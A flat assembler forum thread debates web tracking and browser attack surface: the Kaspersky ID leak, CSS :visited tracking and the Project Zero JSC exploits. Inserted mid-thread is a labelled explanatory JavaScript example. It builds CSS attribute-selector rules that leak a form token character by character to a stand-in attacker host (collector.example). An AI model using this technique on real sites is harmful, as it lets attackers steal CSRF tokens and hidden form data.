flat assembler
Message board for the users of flat assembler.

flat assembler > Heap > Why we should always disable JS (and flash)

Goto page Previous  1, 2, 3 ... , 20, 21, 22  Next
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
https://thehackernews.com/2019/08/kaspersky-antivirus-online-tracking.html
Quote:
"That's a bad idea because other scripts that run in the context of the website domain can access the HTML code at any time—and thus the injected Kaspersky ID. This means in plain language that any website can simply read the Kaspersky ID of the user and misuse it for tracking," the researcher says.
Post 17 Aug 2019, 06:13
sleepsleep



Joined: 05 Oct 2006
Posts: 8419
Location: ˛                             ⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣Posts: 334455
Any example for non JavaScript web application that we could follow and study?
Post 17 Aug 2019, 08:15
sts-q



Joined: 29 Nov 2018
Posts: 26
Thank you for posting, revolution!
Post 17 Aug 2019, 08:50
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
revolution wrote:
https://thehackernews.com/2019/08/kaspersky-antivirus-online-tracking.html
Quote:
"That's a bad idea because other scripts that run in the context of the website domain can access the HTML code at any time—and thus the injected Kaspersky ID. This means in plain language that any website can simply read the Kaspersky ID of the user and misuse it for tracking," the researcher says.

So, a shitty piece of software (antivirus) explicitly leaks its user ID into the context of a website. Now an attacker may find out the user uses Kaspersky software. How exciting! The vulnerability is data leakage and it is in Kaspersky software.

Even worse, being an antivirus it already has administrative privileges to intercept user browsing. But they just decide to rely on what seems easier for a “programmer” with 1 month of experience.

Imagine JS never existed. They would then have to use something like <img src="image.png?id=ABCD-EFGH-XXXX"> or an <iframe>. You can then generate <a>’s with different IDs and use CSS to detect server-side which ID’s page has been visited. It might be a bit trickier, but JS doesn’t add anything fancy here. And it is not the root cause by any means.
Post 17 Aug 2019, 11:49
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
Using an img tag will direct the browser to contact a single site. Using JS all scripts from all sites linked on the page can read the HTML code and report back to multiple places.

And if CSS can be used to do the same thing then CSS also needs to be blocked or neutered or something. I haven't looked into it, but you make it sound dangerous. Do you have some links about its abilities?

It certainly isn't right that websites can have so much power over the user's browsers regardless of whether it is JS or CSS or whatever. Especially since code coming from webpages can't be audited, and every visitor can receive a different version. Some high-profile reviewer that people trust to tell them what is safe could receive perfectly neutral code, while everyone else gets weaponised code to steal their banking details. And there is the problem. It shouldn't be that we need to trust the remote site to be safe. That is wrong headed. We shouldn't have to care.

Browsers can have bugs, they then get fixed to make us safer. JS can be running without bugs, but we need to break it to make us safer.
Post 17 Aug 2019, 16:37
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
revolution wrote:
Using JS all scripts from all sites linked on the page can read the HTML code and report back to multiple places.

revolution wrote:
Using an img tag will direct the browser to contact a single site.

But it’s the fact of the contact that matters and gives data to a third party. If the website owner wants its pages to access another site it doesn’t matter which URL is used.

revolution wrote:
And if CSS can be used to do the same thing then CSS also needs to be blocked or neutered or something. I haven't looked into it, but you make it sound dangerous. Do you have some links about its abilities?

The idea is that you can use :visited pseudo-class to detect if the URL of the link has been accessed recently. And then there’s plenty of ways in CSS to attach an image to particular elements (say, background-image property). That’s quite enough.

revolution wrote:
It certainly isn't right that websites can have so much power over the user's browsers regardless of whether it is JS or CSS or whatever. Especially since code coming from webpages can't be audited, and every visitor can receive a different version. Some high-profile reviewer that people trust to tell them what is safe could receive perfectly neutral code, while everyone else gets weaponised code to steal their banking details. And there is the problem. It shouldn't be that we need to trust the remote site to be safe. That is wrong headed. We shouldn't have to care.

You come back to blaming websites while ignoring non-web applications that have much higher privileges. Remember Thompson’s hack as well: how do you know your debugger shows you what there really is in the executable? How do you know your OS loads exactly the code it lets the debugger read from disk? How do you know you don’t get tricked by a tricky piece of code that seems valid but in fact does some clever (and malicious) stuff in some corner cases? What will you do with messengers, browsers and those mobile apps “you absolutely need to install to use our service” that are allowed to retrieve arbitrary data from the Internet as well as send your data in return?

revolution wrote:
Especially since code coming from webpages can't be audited, and every visitor can receive a different version. Some high-profile reviewer that people trust to tell them what is safe could receive perfectly neutral code, while everyone else gets weaponised code to steal their banking details.

And that is exactly what happened in the case of Kaspersky antivirus. And it didn’t even involve hacking the website. But wait! We all know having antivirus software may (and does) influence the execution of other programs. Now you can avoid antiviruses, which is a good idea. But from the point of view of the rights required, debuggers are quite the same, and there’s quite a lot of other software that might have such rights. Not even mentioning the OS itself. Man-in-the-middle is not required to be outside, it just has to be between you and the program you try to audit.

P.S. Here’s the first link in Google to get the idea: https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense

Note that CSS is just another way of detaching visual properties from actual information. There are custom CSSs in lots of pieces of software around us, not only browsers. Should we stop using best programming practices?
Post 18 Aug 2019, 08:16
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
You come back to blaming websites while ignoring non-web-applications that have much higher privileges.
I can control privileges of native apps. They can't get past the firewall so they can't send any details about me, my data, or my system to remote parties. Also native apps can't suddenly change their behaviour after some fourth party hacks a third party iframe on a second party website from my first party browser. I can run native apps in a VM if I choose to, so they can't see which other apps I run. I can examine the code, or find a trusted reviewer/auditor to examine it for me, and know that what I have is the same as everyone else has. I can run them from a restricted account login.

There are many things I can do with native apps to increase my trust in, and control over, what they can do.
Post 18 Aug 2019, 08:40
sleepsleep



Joined: 05 Oct 2006
Posts: 8419
Location: ˛                             ⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣Posts: 334455
Leaking started the moment we read/write through TCP.

It is like you went to a library, you intended to borrow some books, but you don't want anyone, including the library, to know; but then how could the library confirm it was indeed you who returned those books and that you were returning them in the exact quantity?
Post 18 Aug 2019, 09:23
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
sleepsleep wrote:
It is like you went to a library, you intended to borrow some books, but you don't want anyone, including the library, to know; but then how could the library confirm it was indeed you who returned those books and that you were returning them in the exact quantity?
I'm not sure how that analogy works. With data we don't borrow and return, we just make copies. We can make as many copies as we please and send them to all interested readers. We don't need to worry about getting it back. But, if the data is sensitive, we might need to worry about whether the readers have deleted their copies after they have finished with it. And we might also need to worry about the wrong/unknown parties getting copies of our sensitive data.
Post 18 Aug 2019, 09:30
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
The idea is that you can use :visited pseudo-class to detect if the URL of the link has been accessed recently. And then there’s plenty of ways in CSS to attach an image to particular elements (say, background-image property). That’s quite enough.
Is this URL guessing? That is, we use CSS to try and predict which URLs the user visits/visited? It might work for common sites that use cookies, I suppose, if the URL is unchanging (msn.com) and the ID is in a cookie.

It would be very difficult to guess the AV's injected URL when the URL has a GUID type identifier.

If CSS can directly read the HTML and immediately extract anything it pleases then that would be a much larger threat than URL guessing.
Post 18 Aug 2019, 10:09
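An added example (not code from this thread, and not the code from the linked mike-gualtieri.com post) that speaks to both DimonSoft's description of CSS-only leakage and the "Is this URL guessing?" question above. The `:visited` route is indeed URL guessing, and it has a further limit: mainstream browsers have long restricted what `:visited` may style to colour properties, so a `background-image` request is not issued on visited state. The attribute-selector technique in the linked post needs no guessing: a stylesheet matches `[value^="..."]` one character at a time and each match fetches an image whose URL carries the prefix, so the attacker's server reads a token of any length out of its access log. The block below models that end to end without a browser: an "attacker server" emits stylesheets, a plain object stands in for the victim's DOM, and a small matcher plays the CSS engine. Every host, attribute name and token value is constructed for the demo.

```javascript
// Added example, not from the forum thread or the linked article.
// CSS attribute-selector exfiltration, modelled without a browser.
'use strict';

const COLLECTOR = 'https://collector.example/leak'; // hypothetical attacker host
const HEX = '0123456789abcdef';                     // alphabet of the target value

// Attacker side: one stylesheet per round. For the prefix recovered so far,
// emit one rule per candidate next character; only the rule whose prefix matches
// the real attribute value will make the browser fetch its background image.
function buildStylesheet(selector, attr, prefix, alphabet = HEX) {
  return [...alphabet].map((ch) => {
    const guess = prefix + ch;
    return `${selector}[${attr}^="${guess}"]{background-image:url("${COLLECTOR}?v=${encodeURIComponent(guess)}")}`;
  }).join('\n');
}

// Stand-in for the browser's CSS engine: for each rule, check the victim element
// against tag[a1="v1"][a2^="prefix"] and, on a match, "fetch" the image by
// recording the request URL the attacker's server would see.
function applyStylesheet(victim, css) {
  const rule = /^(\w+)\[(\w+)="([^"]*)"\]\[(\w+)\^="([^"]*)"\]\{background-image:url\("([^"]*)"\)\}$/;
  const requests = [];
  for (const line of css.split('\n')) {
    const m = rule.exec(line);
    if (!m) continue;
    const [, tag, a1, v1, a2, prefix, url] = m;
    const value = victim.attrs[a2];
    if (victim.tag === tag && victim.attrs[a1] === v1 &&
        typeof value === 'string' && value.startsWith(prefix)) {
      requests.push(url);
    }
  }
  return requests;
}

// Attacker side again: recover the confirmed prefix from the collector hit.
function prefixFromRequest(url) {
  return new URL(url).searchParams.get('v');
}

// Drive the rounds: serve a stylesheet, see which image URL is requested, extend
// the prefix, repeat until no rule fires. Zero hits means either the end of the
// value or a character outside the alphabet; in both cases the partial value
// recovered so far is returned.
function exfiltrate(victim, selector, attr, opts = {}) {
  const { alphabet = HEX, maxRounds = 64 } = opts;
  let prefix = '';
  for (let round = 0; round < maxRounds; round++) {
    const hits = applyStylesheet(victim, buildStylesheet(selector, attr, prefix, alphabet));
    if (hits.length !== 1) break;
    prefix = prefixFromRequest(hits[0]);
  }
  return prefix;
}

// Constructed victim DOM, standing in for <input name="csrf" value="9f3a1c">.
const VICTIM = { tag: 'input', attrs: { name: 'csrf', value: '9f3a1c' } };

console.log(exfiltrate(VICTIM, 'input[name="csrf"]', 'value')); // the full token
```

The real attack needs a way to serve a fresh stylesheet per round (the linked post chains them through `@import`), but the logic is the one above: the value is read out of an attribute by the style engine, with no script on the page. It only works for data that sits in an attribute, which is why it reaches hidden form fields and tokens placed in markup, and not, for instance, cookie contents.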
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
Yet another example of JS being used to exploit you. And in this case it was to persecute the Uyghurs, but it could have been for anything they wanted

https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html

It all started with JS. After that you're owned. You didn't need to click anything, or do anything, other than visit a webpage.

Bruce Schneier also reports on this:

https://www.schneier.com/blog/archives/2019/09/massive_iphone_.html
Post 03 Sep 2019, 11:50
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
Google Project Zero wrote:
This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.

The bug causes an out-of-bounds write to the JSC heap with controlled data.

So, it’s not that JS itself let it do the stuff, it’s just the buggy environment that fails to catch out-of-bounds errors. Having a buggy managed environment you could as well trigger it in plain C#, Java, whatever. The victim is the user who opens a webpage. The attacker is the owner of a website containing the page. But a website visitor should already trust the website owner, so the victim trusts the attacker.

Imagine you have a manager person who is responsible for managing the house you live in, like, say, making sure the house is clean and the bills are paid (browser). You tell the manager (browser) to invite someone for house cleaning (to open a webpage). The cleaning company sends him someone who has just got out of jail (malicious webpage). The cleaner person (malicious webpage) tricks the manager (browser) by exploiting his trusting nature (out-of-bounds bug) into letting him come into your room and steal your money, break everything, etc. (arbitrary code execution and stuff).

Now, who’s responsible for the situation? I say that it’s not the fault of the natural language they used to communicate. Whether they spoke Spanish, Latin, Esperanto or HTML, it could still be possible to achieve the goal. You can’t avoid using the language ’cause it’s just a way to express the idea of what should be done (shown to present a webpage to the user). They could have used sign language, pictures and DMDT (direct mental data transmission).

The problem is with the trusting manager (browser) but you have explicitly allowed (and even asked) an unreliable person (buggy browser) to meet the threat (malicious webpage). It is the manager’s fault but OTOH he just performed according to your instructions and did what he could. So at the end of the day it’s your fault to trust cleaning company instead of cleaning the house yourself or making the manager wash your floors which he wasn’t taught to (browser has no information from the webpage until it downloads it).

Now you either retrieve and process all the data yourself, or you have to trust your browser to be bugless (ha-ha, cool joke!) and the website owner (cleaning company) to be responsible enough not to send bad guys to you.

So, are you willing to stop using web browsers and other software that can get and process data from the internet?
Post 04 Sep 2019, 05:35
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
But a website visitor should already trust the website owner, so the victim trusts the attacker.
I don't agree with that. I can't trust any website. I don't know who controls the website, even this website. It could be a hacker that controls a website, not the person that owns the domain, or the person that owns the equipment, or the person that has the admin password. Those other people might think they are in control, but some hacker might have exploited something (which is the case with the article above). So, no, there are no websites that can be trusted. The trust model is just not there. We are all strangers.


Last edited by revolution on 04 Sep 2019, 09:14; edited 1 time in total
Post 04 Sep 2019, 06:09
guignol



Joined: 06 Dec 2008
Posts: 621
Location: I mean good, I know better, only us will do best
Post 04 Sep 2019, 08:08
KerimF



Joined: 23 Aug 2019
Posts: 16
Location: Aleppo-Syria
We were taught when we were kids, and we are teaching our kids now, not to trust anyone who is a stranger and offers something for free.

How many of us, the adults, break this advice every day? ;)
I mean, how many times do we have to break it, by habit perhaps, daily?

Fortunately, thieves are not interested in a rather empty pocket or house (as mine :D ).

We like it or not; every new technology/discovery has always two faces; it could be used for the good or bad; it depends on the situation. Only dreamers (who didn't have yet enough experiences in life) believe that this natural truth could be changed someday.
Post 04 Sep 2019, 08:28
guignol



Joined: 06 Dec 2008
Posts: 621
Location: I mean good, I know better, only us will do best
Any-how, what is wrong with Ruby?


after JavaScript, anything with 'script' in the name (like SomeSkryptt) will sound like BullShit, all the same
Post 05 Sep 2019, 11:39
DimonSoft



Joined: 03 Mar 2010
Posts: 572
Location: Belarus
revolution wrote:
DimonSoft wrote:
But a website visitor should already trust the website owner, so the victim trusts the attacker.
I don't agree with that. I can't trust any website. I don't know who controls the website, even this website. It could be a hacker that controls a website, not the person that owns the domain, or the person that owns the equipment, or the person that has the admin password. Those other people might think they are in control, but some hacker might have exploited something (which is the case with the article above). So, no, there are no websites that can be trusted. The trust model is just not there. We are all strangers.

By running any application that accesses the network you implicitly trust the application. A web browser produces its output by processing data retrieved from a website. It’s you who directs the browser to that particular website. So you implicitly have to trust the website owner not to trick your browser into doing strange stuff. Just like you have to trust a DOC file not to trick your MS Word into doing strange stuff.

Trust or stop using all the tech stuff.
Post 05 Sep 2019, 17:12
guignol



Joined: 06 Dec 2008
Posts: 621
Location: I mean good, I know better, only us will do best
In Godd we trust.
Post 05 Sep 2019, 19:19
KerimF



Joined: 23 Aug 2019
Posts: 16
Location: Aleppo-Syria
Quote:

Trust or stop using all the tech stuff.

Actually, it is not about 'trust'. It is about the necessity of obedience.

Based on my observations, it seems to me that this is life since always.
Only the tools in the world's masters/slaves games evolve with time.

The good news is that most people around the world don't mind joining and even enjoy most of these games (some are international now).
Meanwhile the most powerful rich Elite around the world keep investing, under or above the table, in developing better tools... for a brighter future :?

Isn't it a wonderful world :D
Post 05 Sep 2019, 22:03
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16792
Location: In your JS exploiting you and your system
DimonSoft wrote:
A web browser produces its output by processing data retrieved from a website. It’s you who directs the browser to that particular website. So you implicitly have to trust the website owner not to trick your browser into doing strange stuff. Just like you have to trust a DOC file not to trick your MS Word into doing strange stuff.
I don't have to trust any website not to trick me or my browser. I can choose not to run their malware laced JS, I don't have to trust it. I can choose not to view booby-trapped images, I don't have to trust them. I can choose to not allow random apps like Word to access the Internet, I don't have to trust it.
Post 05 Sep 2019, 22:26
Copyright © 1999-2019, Tomasz Grysztar.

Powered by rwasa.